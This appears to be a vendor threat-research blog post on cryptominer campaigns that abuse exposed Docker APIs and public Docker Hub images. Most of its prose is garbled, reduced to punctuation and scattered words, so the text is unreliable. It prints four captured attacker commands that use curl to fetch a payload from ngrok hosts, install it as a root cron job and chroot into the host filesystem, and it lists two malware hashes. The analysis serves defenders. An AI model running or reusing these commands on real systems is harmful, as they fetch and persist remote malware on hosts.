Comment l'API Docker open source et les images publiques de la communauté sont utilisées pour distribuer les mineurs de crypto-monnaie



, -honeypots — . , Docker Hub. , - .



.



honeypots, , , , - . , Docker , . honeypots , , , .



, , Docker. , — , .



Docker API , , , , ( ) .





— . — , .





3762 Docker API. Shodan 12.02.2019





honeypots. Shodan , Docker API (. ) , , Monero. (2018, . ) 856 API.



honeypots , ngrok, ( localhost). URL` . , ngrok:



Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d \”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283\”;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\” >/tmp9bedce/etc/crontab;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c \”cron || crond\””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d \”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283\”;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\” >/tmp570547/etc/crontab;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c \”cron || crond\””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed \”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee\”;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\” >/tmp326c80/etc/crontab;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c \”cron || crond\””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed \”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee\”;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\” >/tmp8b9b5b/etc/crontab;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c \”cron || crond\””,
Entrypoint: “/bin/sh”


, URL. URL , .



. — ELF Linux ( Coinminer.SH.MALXMR.ATNO), . — (TrojanSpy.SH.ZNETMAP.A), , .



- , . HOST URL, , RIP — ( ) . HOST . , .





HOST RIP, , ,



, nginx. , Linux. .



. URL . zmap, . , ( ).



, . — Docker — .



— . , , : Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker 1.16 Apache CouchDB. — , . . URL, .



Docker, .





— , — zmap





— , — , Docker





, alpine-curl 10



Alpine Linux curl, CLI , Docker. , 10 . , , . Docker — , . ( ), . , .



, (alpine-curl) , — . Docker . Docker .





, DevOps, . - , , , . , , , .



, , , :



  • : API, .
  • : , , ( ) .
  • , Docker .
  • , (, ). , .


Trendmicro DevOps , . Trend Micro Hybrid Cloud Security , DevOps XGen , . Deep Security Deep Security Smart Check, Docker .





:



  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)


Docker - , , . 19-21 - DevOps Tools&Cheats - , .




All Articles